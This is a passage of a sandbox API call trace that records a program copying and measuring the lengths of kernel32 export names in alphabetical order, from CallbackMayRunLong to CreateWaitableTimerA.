lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.624] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.624] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.624] lstrlenA (lpString="CANCELIO") returned 8 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.624] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.624] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.624] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.624] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.624] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.624] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.624] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.624] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.624] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.624] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.624] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.624] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.624] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.624] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.624] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.625] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.625] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.625] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.625] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.625] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.625] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.625] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.625] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.625] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.625] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.625] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.625] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.625] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.625] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.626] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.626] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.626] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.626] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.626] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.626] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.626] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.626] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.626] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.626] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.626] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.626] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.626] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.626] lstrlenA (lpString="COPYFILEA") returned 9 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.626] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.626] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.626] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.626] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.626] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.627] lstrlenA (lpString="COPYFILEW") returned 9 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.627] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.627] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.627] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.627] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.627] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.627] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.627] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.627] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.627] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.627] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.627] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.627] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.627] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.627] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.627] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.627] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.627] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.628] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.628] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.628] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.628] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.628] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.628] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.628] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.628] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.628] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.628] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.628] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.628] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.628] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.628] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.628] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.628] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.628] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.628] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.629] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.629] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.629] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.629] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.629] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.629] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.629] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.629] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.629] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.629] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.629] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.629] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.629] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.629] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.629] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.629] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.629] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.629] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.630] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.630] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.630] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.630] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.630] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.630] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.630] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.630] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.630] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.630] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.630] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.630] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.630] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.630] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.630] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.630] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.630] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.630] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.630] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.631] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.631] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.631] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.631] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.631] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.631] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" 